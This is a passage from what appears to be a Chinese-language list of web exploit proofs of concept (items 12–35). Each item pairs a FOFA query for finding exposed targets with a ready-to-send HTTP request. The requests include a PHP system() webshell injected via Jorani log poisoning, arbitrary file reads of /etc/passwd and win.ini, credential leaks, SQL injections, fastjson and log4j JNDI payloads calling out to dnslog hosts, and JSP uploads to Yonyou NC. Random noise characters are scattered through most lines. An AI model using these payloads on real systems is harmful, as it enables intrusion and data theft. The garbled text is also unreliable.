, u5 Y* x0 _; G3 d/ I+ jUpgrade-Insecure-Requests: 1$ }; C' m, |* P+ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# h, N2 b4 C' s8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 d9 r. G7 o. q& R! T% Q% B# U- NAccept-Encoding: gzip, deflate
$ f9 A8 }( | r3 X% |2 oAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ \4 Q% ?* [# g, f" r1 y
Connection: close2 p/ h7 ^6 f( B
3 x9 f& e" L9 P- P. K
: f! V' s# Q" Z- \( _1 n12. Jorani < 1.0.2 远程命令执行, R! k5 i9 Z8 ?; I
FOFA:title="Jorani"- V1 ]- @5 V% X0 Z) |, y" n
第一步先拿到cookie1 ~1 F+ b9 _! B
GET /session/login HTTP/1.1
/ E& {* G8 z8 \* ~/ L, ?Host: 192.168.190.30
]5 J) |: w! TUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
" p9 t' V9 r, T2 E3 pConnection: close
0 D: d* U, F u4 R/ p7 IAccept-Encoding: gzip
6 W' Q# F8 z; f
, V; [2 z1 I( t; F1 e. Z: e5 a' w, c7 s3 n% q! W
响应中csrf_cookie_jorani用于后续请求6 m4 x0 }+ u( r0 N/ n$ W/ B8 E# L
HTTP/1.1 200 OK' }, d7 E+ K% C2 k
Connection: close
* U$ Y& D: \4 d2 R K1 ]Cache-Control: no-store, no-cache, must-revalidate
+ J8 P5 O- a9 b6 [8 K; iContent-Type: text/html; charset=UTF-8 ?$ W# K3 E+ ^% I5 y
Date: Tue, 24 Oct 2023 09:34:28 GMT
' s' F5 c% }9 r2 g' _" c- p, s* E+ {Expires: Thu, 19 Nov 1981 08:52:00 GMT
$ k+ L$ m- D9 pLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
% w8 p' o3 h* C& d9 mPragma: no-cache
h1 ]; o: v# S8 Q% E# o5 gServer: Apache/2.4.54 (Debian)6 o/ C# i/ q b5 n( W4 v
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/' k: [2 z, K- i! v" R" i
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
; D! Y3 X! A" Z7 x/ ]8 ?Vary: Accept-Encoding: w& G/ y* Z$ ?( ?
3 U; r* C4 H( h0 ?* C/ C
3 @8 z9 J6 U0 P+ g% PPOST请求,执行函数并进行base64编码
# p* Y E3 a- B6 n8 x' k8 vPOST /session/login HTTP/1.1
4 _) `, p8 w! f. D. y+ KHost: 192.168.190.30
" G8 a, q6 t; j [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36, C5 v" @! \' f, X- p7 l. m
Connection: close# n' }3 q+ [) C$ m4 F& F* A
Content-Length: 252
, _1 l: F5 `9 {# ~2 j1 ]% H, FContent-Type: application/x-www-form-urlencoded. i7 V' `" ?9 j8 u, K
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r" L: d- F( R6 @# m3 z
Accept-Encoding: gzip! i6 i+ J+ \' K4 d7 P) Z9 Q
4 f, R* m8 T M( A3 Lcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
: K* ^( t, \9 B8 n
/ y% h% C' ]; t. E4 m8 j
0 j* B" j& J; J% H. C+ J! j6 f3 U" z4 R% {* \0 x) Q
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
' Q6 f1 A0 }7 p7 J9 V3 w- u) ^3 C, eGET /pages/view/log-2023-10-24 HTTP/1.1
6 Q* A5 X v3 B9 ^2 |) @Host: 192.168.190.30: i' [, d7 m% B( s: A8 K3 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 W9 @* {3 e5 a* k9 S' K+ S6 {; ~
Connection: close: o9 ?; Q, T; X9 T+ ^3 G
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r3 _ S2 H7 l v# d- _ n
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
. `: e" i* U8 o4 |: a' S1 K1 RX-REQUESTED-WITH: XMLHttpRequest
0 w8 R) j: z7 l6 mAccept-Encoding: gzip
6 W" G, p! M% \) Z ~$ K h
: r0 `4 | i2 A/ }
/ f: t' x4 U4 k! o13. 红帆iOffice ioFileDown任意文件读取, N; _6 Y& n- _* Q
FOFA:app="红帆-ioffice"5 o5 H) ~& f& w1 O
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1, T8 |$ t/ f g( O& P$ I1 G" o
Host: x.x.x.x1 B( i1 O0 @% C/ x, @ h5 O+ d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 t9 j( d! [4 x2 j2 jConnection: close" _! [2 Z' ?! ~* R- l2 G$ h; K+ d
Accept: */* a+ z4 j7 p {1 s7 x$ d
Accept-Encoding: gzip
* U% {6 Y4 Q& o3 I
0 \9 ^% O4 F3 C7 W2 L# V) [
# d! f' g" @# p" M* h14. 华夏ERP(jshERP)敏感信息泄露
" W* B* ^! A, B5 U! v! MFOFA:body="jshERP-boot". R5 G+ ]! ~; r; f
泄露内容包括用户名密码
* m+ b( \# t3 K! A( s! pGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
& ^% ?; U E7 D6 ^) q; mHost: x.x.x.x4 s/ K2 k4 J0 X2 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
4 |4 Y2 V" ^$ o# qConnection: close, u/ e' X& F& Z: f
Accept: */*
7 ?: P6 p: u0 _9 L0 A: z; _Accept-Language: en! d* B7 G6 m, B6 ?9 C: T+ z, T
Accept-Encoding: gzip; f' H; m( C# O# I; u+ B
. y1 K2 Y6 ~0 }1 F7 ?1 k* k5 {
15. 华夏ERP getAllList信息泄露
6 W `9 O& W' \1 p. d& w6 ^CVE-2024-04901 M- ^* ^0 q+ d% X2 Z' ]
FOFA:body="jshERP-boot"
b$ ?$ u% z( n8 U* k' P泄露内容包括用户名密码) I% G. O. @/ x( a
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
4 X/ b6 t- ^7 |Host: 192.168.40.130:100
- H8 B4 C# x" S# e) P- e& ^! |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" y1 d4 N; m& i; i! b
Connection: close
: |: D7 D! ? i, e6 A& DAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
, W2 o/ Q; X+ w5 a) l3 zAccept-Language: en
+ I+ n$ A: Q J( K6 N1 lsec-ch-ua-platform: Windows- R! e/ t- ?$ \0 q5 [
Accept-Encoding: gzip- M9 U& z# \# e, N+ s. Q* `( l
# Y; I4 S r k* Q; {3 O; k- x; m
, ?) D" @5 P# ?8 M: [0 \
16. 红帆HFOffice医微云SQL注入" M! d+ F: }. g
FOFA:title="HFOffice"
' \' Y4 m- [ o+ C, J0 K3 Upoc中调用函数计算1234的md5值& H; ^# I- {5 X4 I. m) S' c5 K
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1- d* H3 _& i* f8 J R
Host: x.x.x.x
$ {& A2 l9 x' o! R DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
- J# N* T9 W8 x5 W4 M: `" Y: qConnection: close
- S& v9 T: M& s/ ~+ k5 QAccept: */*- E# Q% }) ~/ E
Accept-Language: en4 `6 D Q8 i7 O% t, {
Accept-Encoding: gzip6 m. k. B* ^* t) l0 m/ a
+ q3 S: J9 v! F+ o' l6 X# q9 X9 ?8 i$ w! S1 g& S
17. 大华 DSS itcBulletin SQL 注入
# E7 `3 p" u9 @) c" OFOFA:app="dahua-DSS"7 ?/ I9 P( g. L e" Q" X
POST /portal/services/itcBulletin?wsdl HTTP/1.1
' s* a4 b8 t: S' ]Host: x.x.x.x9 V2 \1 ? p6 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% i a* P& {( j+ x8 R$ b
Connection: close. F9 C) Z* F% ?2 d; h p3 _
Content-Length: 3453 f I/ D' v8 U# _, B
Accept-Encoding: gzip0 R( S( \6 Y4 v! O0 j# _/ z
/ P$ o" n9 ], H6 i, [
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
1 w- h/ Z3 M; W8 |2 g' [. ^4 i+ e; B<s11:Body># U5 V. Q% Q' X/ ]) I
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>* A% {$ C$ C& ~
<netMarkings>
& v; V7 ^7 {5 q (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1. v4 @" E1 T7 l" K; ~; W3 O4 {* f( U
</netMarkings>+ }% A: d# z$ @" g |- ^. V
</ns1:deleteBulletin>& _4 w$ o: V( i, n0 B( U
</s11:Body>5 `6 I6 Q# ~7 p+ B0 D
</s11:Envelope>
6 Y: c: I9 ~) _- H) e) s E4 [) e
# f! v% X+ l1 x7 p1 i+ K D
/ p. @# U( {+ k# g) u3 s' n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
; @) g" `" W" m% A! E+ YFOFA:app="dahua-DSS"
$ J, j: P6 A2 C [4 c4 f" V' HGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
# b+ V3 L$ I1 ^; [$ m. Z1 I) |' qHost: your-ip
- Z$ A$ r) T% _; c/ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 o% b3 m6 g0 I) s6 V8 ?Accept-Encoding: gzip, deflate T V( ]1 J1 o- ]# s; j% G& h
Accept: */*2 I) y8 ?; g2 n. }: g/ z
Connection: keep-alive: P. W+ L- w. b$ O- w
7 ^3 S5 V# b m0 Q/ g. F% G0 y
# z! j3 y8 V: M% A* `
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& s# v0 R4 g, ?( k% C
FOFA:app="dahua-DSS"( A9 d! k3 p7 `1 F; p( P
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
1 v4 E0 c3 y8 K- p9 b1 w: R; jHost:
+ K3 R7 g2 A( l4 F' i; Y% z' JUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 u& ?" p, R5 \ d: l, a) aAccept-Encoding: gzip, deflate
: `& U5 D8 q, z& rAccept: */*8 v7 t7 k0 J8 n+ S# L
Connection: keep-alive
, l7 L0 A: [( e- |& S
' X5 K' o) |/ O4 S/ B8 D) {, V. N" B) R9 O( d: t7 t
20. 大华ICC智能物联综合管理平台任意文件读取: W4 ?4 Q9 m2 S! e* R; c( r7 O9 Y
FOFA:body="*客户端会小于800*": p. h6 Q6 \8 J; A; v3 M$ h
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1( m( t9 ?% d* N, T- Q& ~2 H$ d
Host: x.x.x.x
% G7 Y/ P- T# L+ ^+ LUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" I: Z& D" D# Z3 b1 d" WConnection: close
7 T( k! [) y8 ~ U1 J/ SAccept: */*
; |% C9 T' G$ Z) C) J% ~# |8 _' ZAccept-Language: en
- T, X) a# p6 m: a' M( uAccept-Encoding: gzip5 I) @2 e( B; N% e: [3 {; Q, d
7 k1 E4 A+ S/ }. N/ s3 x2 y( l7 ?5 X2 S' d+ R8 n+ Q2 r9 p6 C
21. 大华ICC智能物联综合管理平台random远程代码执行9 ~& `2 K7 {! r. i2 m, r; b
FOFA:icon_hash="-1935899595"; Y0 S5 c- Y* Z( s. I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ i4 t% |- @! I% q. L; U5 F
Host: x.x.x.x
: x" i1 `. E0 Q Q! oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ c; j, q1 S* A KContent-Length: 1618 R* `7 H+ A, Y# W2 C ?: I* N" b
Accept-Encoding: gzip) i; i F5 \7 s
Connection: close" | o. a2 Q$ n$ ~4 O& Q. x
Content-Type: application/json;charset=utf-8
, l4 [% i, J! d* U! q. a
! x2 X6 d3 X2 w% t! ^6 h; g{6 G! X* l. d9 R; K+ [; v+ }
"a":{; _8 E3 J( T3 ?
"@type":"com.alibaba.fastjson.JSONObject",3 ^+ ^' u! Y [0 P
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
+ N. m2 Z' z9 }. } }""
2 E% W: C8 c! G! u2 \. F}& y; Q8 ?4 S0 C5 D) O* C* b; r
8 k- y: M0 v3 G( N2 r# Y
' J: U; k& N9 C22. 大华ICC智能物联综合管理平台 log4j远程代码执行; g& s2 P; ] ^ f. S/ [; Z
FOFA:icon_hash="-1935899595"
" X/ F# Z' @, c5 ~2 hPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
; M6 T3 [2 d0 {6 P5 q: u3 wHost: your-ip: J3 B4 B' O! _2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 K$ X* m0 d! L' _
Content-Type: application/json;charset=utf-8( Y& @& k* e3 |* ?) P) m
! A0 k' u R$ B8 P
{8 N7 o7 w% c0 G6 X7 u/ |
"loginName":"${jndi:ldap://dnslog}"
- I9 D# M7 X& ]; C# t* |0 r}+ M( r4 G& u4 W8 p( ~" a
8 n0 x' X, {. M$ O& E
. K0 |* `1 Z& o
6 `; I- W- b0 V2 @ K
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
' |' d8 F3 r5 S' u+ |FOFA:icon_hash="-1935899595"
2 X: z p5 Z- i+ GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& H* P" T3 b/ F# Q U
Host: your-ip
0 v% g& @5 G, ^5 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ S6 P) k( U9 \! N: S" ^: a. ~Content-Type: application/json;charset=utf-8
- A6 t$ Z, E8 B1 d9 { G! j, xAccept-Encoding: gzip
5 B J+ v* O; P) j3 b6 b' fConnection: close7 q8 p+ ^% w' n: j$ v) |5 l
; ]: B$ m1 ^+ ^ G( J( S{
% J5 Z# B- e* `( W "a":{
0 M0 S2 O) f/ E' f: _ "@type":"com.alibaba.fastjson.JSONObject",, n% k7 }5 R( s
{"@type":"java.net.URL","val":"http://DNSLOG"}
! w/ g8 M/ r- R' s3 ~' x }""4 o {- u6 J9 d- A6 h
}
" i5 j. Y: I9 y6 r2 g0 |* U# @) I5 i, C9 O) P4 O4 V0 ]4 Q
* F7 ^/ _9 l. Y" O, c; i: S6 R7 x24. 用友NC 6.5 accept.jsp任意文件上传( t# Q7 I* T' Y7 k- p
FOFA:icon_hash="1085941792"5 a, P5 K1 P/ s- L
POST /aim/equipmap/accept.jsp HTTP/1.1* m$ x: ^7 S" Z; c1 \! m9 X
Host: x.x.x.x; o* F, l$ H0 O: S! K
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
]0 g; g, x' I+ aConnection: close
1 J A- n- d! O+ eContent-Length: 449
6 V( V2 v: _ ^$ P0 AAccept: */*7 j% p- Z; H! h
Accept-Encoding: gzip
. ]# C) O+ Y: y6 ^% _( U iContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
$ D3 d# ^# x. b5 t) l, n# n
, G2 M* e/ z0 G$ m-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# [3 P1 Q% h, V
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
% Y0 Y1 X$ o ~' H9 PContent-Type: text/plain
" C" O. S5 \' f& i$ t! c% y `+ o' Z8 F
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
7 L6 h, a3 o% C M; e! j6 d) s-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ L6 h# i1 l' q# p
Content-Disposition: form-data; name="fname"
1 l! `0 b# `% ^" x" \5 S6 Y" q/ p4 Z" E0 v2 `9 L3 O
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
# i0 o9 c) O5 t, e) Q j-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--, G6 D* @0 W3 L+ N+ c9 e" g
& Z6 V2 V) `" o. ~. M
9 d% ^, j4 P ?6 A3 W25. 用友NC registerServlet JNDI 远程代码执行
$ u5 i) b/ a$ J7 S& Y9 T6 ~FOFA:app="用友-UFIDA-NC"
* h" |. v; U$ X! M' xPOST /portal/registerServlet HTTP/1.18 d+ D, q5 l1 f
Host: your-ip7 l& a* [! y0 X6 Z6 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0# F. N+ n/ g$ u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9( |; F3 S* m+ i0 F0 M7 p3 _. g1 J
Accept-Encoding: gzip, deflate6 z) E4 `0 t/ r$ g/ V# @0 b
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6- ?3 D4 U6 a) W* ^& m: v' L
Content-Type: application/x-www-form-urlencoded
5 }' Q+ r, q. `9 C( E) g8 e# N2 g) w. y N9 G) ]2 | X
type=1&dsname=ldap://dnslog- m) P" X( e8 `" K# V7 B4 m; d
) M: `; u# [* h! D: J$ E
* C4 b: I: e, ~, ?
2 ]$ t4 k4 v$ z% a5 ^
26. 用友NC linkVoucher SQL注入. F% A G5 _! ^2 [$ E! `( b6 F
FOFA:app="用友-UFIDA-NC"* c6 R) z. {6 K1 q6 m4 y
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 n/ [. `3 B* `8 s4 g. I% H C2 jHost: your-ip
; _* v0 ?5 }; r! |: LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' j! t+ }7 N+ S+ aContent-Type: application/x-www-form-urlencoded+ ^0 m9 m9 @: T
Accept-Encoding: gzip, deflate: M% [$ u" J& K6 ~# E
Accept: */*
9 g7 p7 g4 C* m( E) C5 J) s6 Z. SConnection: keep-alive
3 l3 f- U1 [9 F
* W1 H! V! M5 p( I
: z7 W0 q- k$ y' i( h; h4 V27. 用友 NC showcontent SQL注入5 e! K$ H! F5 s g4 i! g! p2 c
FOFA:icon_hash="1085941792". {, b, J; P B! I
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
' t5 R( U4 O: Z' [Host: your-ip
" Z) h' t: D5 X! p: B Y& ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* R& I" H+ m; I# p* HAccept-Encoding: identity1 i5 X) {6 f& t* [
Connection: close
' ?, b2 v: b0 k4 l( X% oContent-Type: text/xml; charset=utf-8
. Y& o. Z/ @/ X3 K6 r
4 ]; m% ` U2 Y3 |) `' k
; N. C2 L; {6 a! X6 M, o% _8 W28. 用友NC grouptemplet 任意文件上传1 j# g* t9 u. g ~8 q: e
FOFA:icon_hash="1085941792"# \( I; s5 V" R; y& \4 I
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.10 i& g& L9 i; \: s
Host: x.x.x.x2 m" [, J" n- P1 H* k: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
I# t' m- I1 ^# X* m/ EConnection: close
" A/ }+ ]. \, k1 }& JContent-Length: 268$ D4 b" w: C% ]4 m( V- U
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk0 q+ b* m* V% X: c( M6 r; I$ V p7 L
Accept-Encoding: gzip! }% `( C+ A5 V& f3 X2 M+ U5 r
9 x* J5 N' h! G7 K0 P, ?6 Y
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
0 h n, a1 X* f% A B$ I! K- eContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
( S8 R# z5 B% K) s- `! VContent-Type: application/octet-stream
8 H, n9 F# {* B8 r4 s1 G- ^9 o# e# N8 `: y
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
# P5 `. t# ?8 C( e5 Z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
6 e! I$ M o% A9 j5 o
& K, y7 w* ~) o% O5 f0 M5 J4 y/ N( t, t, n) W% B1 E1 N7 x2 @) g
/uapim/static/pages/nc/head.jsp
9 H: a! k4 l* p$ ]& ~ u3 y' {! z
1 Z2 y: U5 T- K3 X, j) X) T0 ?29. 用友NC down/bill SQL注入) K) v Q! c+ w1 G0 y& X. l$ r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& H8 O6 \: ^8 G g8 l5 B. W
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
- |2 A' ?0 Z" ~Host: your-ip. A$ R; V* n' Y2 m# { ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; x" R' ?+ X- v! ~+ O9 ]% X% FContent-Type: application/x-www-form-urlencoded6 w! K! e3 I. @& `, N$ @2 s
Accept-Encoding: gzip, deflate. ~6 ^5 P: s" ?; T0 e
Accept: */*
' G' n/ }, n; J) @' d0 rConnection: keep-alive
, m+ F) ^3 |% I w; j4 n! Y4 [) \1 ?( h5 ^$ }+ a! X
v' g7 X! i% b
30. 用友NC importPml SQL注入
+ c# Y3 w0 r* |/ X ]4 G+ }; KFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 M/ R* F$ B- o0 D) ?5 B
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1: |7 u0 V4 F9 _) l
Host: your-ip
9 |8 |8 q4 L z) _* M5 ?5 b+ ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ K5 D8 `4 _7 h. `1 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 T; e- D: R- B# `* wConnection: close" Y+ J9 F' b V) p1 B, H
W* c( G) i ]
------WebKitFormBoundaryH970hbttBhoCyj9V ]. a8 g* Q% ^ d8 K k! _% w" b0 @
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"1 B k2 _- F/ G$ j! U% n1 k2 n
Content-Type: image/jpeg9 z8 e# T; f, y9 F8 ]7 K1 y
------WebKitFormBoundaryH970hbttBhoCyj9V--
8 L/ @. g5 y, N z( u ?: Z
7 J% d2 v5 H+ D' U- x9 U9 y4 q1 C8 Y! v' Y
31. 用友NC runStateServlet SQL注入
, U- n( |; b! P* C( k0 @version<=6.5
1 H; ^% N' E- m9 P. ~( F0 P& _( F0 z& QFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' y a* n& {. B/ e1 d! X0 d" VGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) c- o* }8 G) mHost: host
5 _* ~- Z+ J. H9 d/ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 t6 [0 o6 d9 F* u. |+ z) v; ?/ m% U
Content-Type: application/x-www-form-urlencoded. {( E9 g& w$ Q
+ q$ I# y6 _$ [
2 z5 h4 N" w" W9 E+ J$ i32. 用友NC complainbilldetail SQL注入
0 a* O. v9 b; p+ c t/ rversion= NC633、NC65
8 w7 X0 }* o/ T6 d: x0 kFOFA:app="用友-UFIDA-NC"
7 _. A8 z0 J7 h4 I/ B% U4 x, SGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! |4 O: P/ z2 a5 U/ G/ k- \Host: your-ip
; C- h5 }- Z: O4 {* v5 E% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& z ]2 h- I: l2 PContent-Type: application/x-www-form-urlencoded! V; c6 [, |) r1 ?& s L3 n A
Accept-Encoding: gzip, deflate
& n0 @; S# e4 B+ q( U+ Y' _" ^Accept: */*
: ]$ x r: T, u& F9 n' h( T5 qConnection: keep-alive
2 l: X# u' S P
G. A2 u" J1 d6 p- K
" R% V# i* O; H7 n' a33. 用友NC downTax/download SQL注入% ^" I" }# B" g( v. E2 H
version:NC6.5FOFA:app="用友-UFIDA-NC"
: n7 }0 U) }8 R- f7 NGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" t9 B4 u4 I4 l dHost: your-ip; Y- I* P4 [' ^) G) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; J4 H" v7 K0 b( {8 G. `, iContent-Type: application/x-www-form-urlencoded
$ r# q. I# g' M$ K. Y9 \9 j) FAccept-Encoding: gzip, deflate
4 ^7 o! V4 i Q4 CAccept: */*% u2 I! _0 n$ @; g
Connection: keep-alive
; D% f& O }# u. ~) [) w& M( d: d" @6 t1 l1 H% v- O
$ t2 _7 o. \) R8 n/ L34. 用友NC warningDetailInfo接口SQL注入: T/ |* e& T" `# Y" w' S
FOFA:app="用友-UFIDA-NC"
* `( o- q {5 ]' ?& dGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* ]8 t- e! C; w0 R" _2 ]- C, S
Host: your-ip
: r" r! t1 f4 p1 g5 H7 `2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 W g7 K% m$ e$ H$ e
Content-Type: application/x-www-form-urlencoded- l% V7 U+ k4 a+ |4 n- n& j
Accept-Encoding: gzip, deflate: Z- U' E- P5 C9 ^
Accept: */*
* @" }( x% k3 N Q2 GConnection: keep-alive
6 O) g; P. t/ ]) \2 e
* }* G ] v7 b' V! b
$ D% p7 N! X7 X, q1 v" p35. 用友NC-Cloud importhttpscer任意文件上传5 H6 u+ l- q2 J: M$ H) I
FOFA:app="用友-NC-Cloud"
4 a1 L' L3 s. m" J6 ]2 H* J6 qPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
$ }# [: |8 }. O, L* a! e. r h$ uHost: 203.25.218.166:8888
1 g* N& M9 Q: O D. W8 eUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! O' ^4 o! {. M* t( c- W
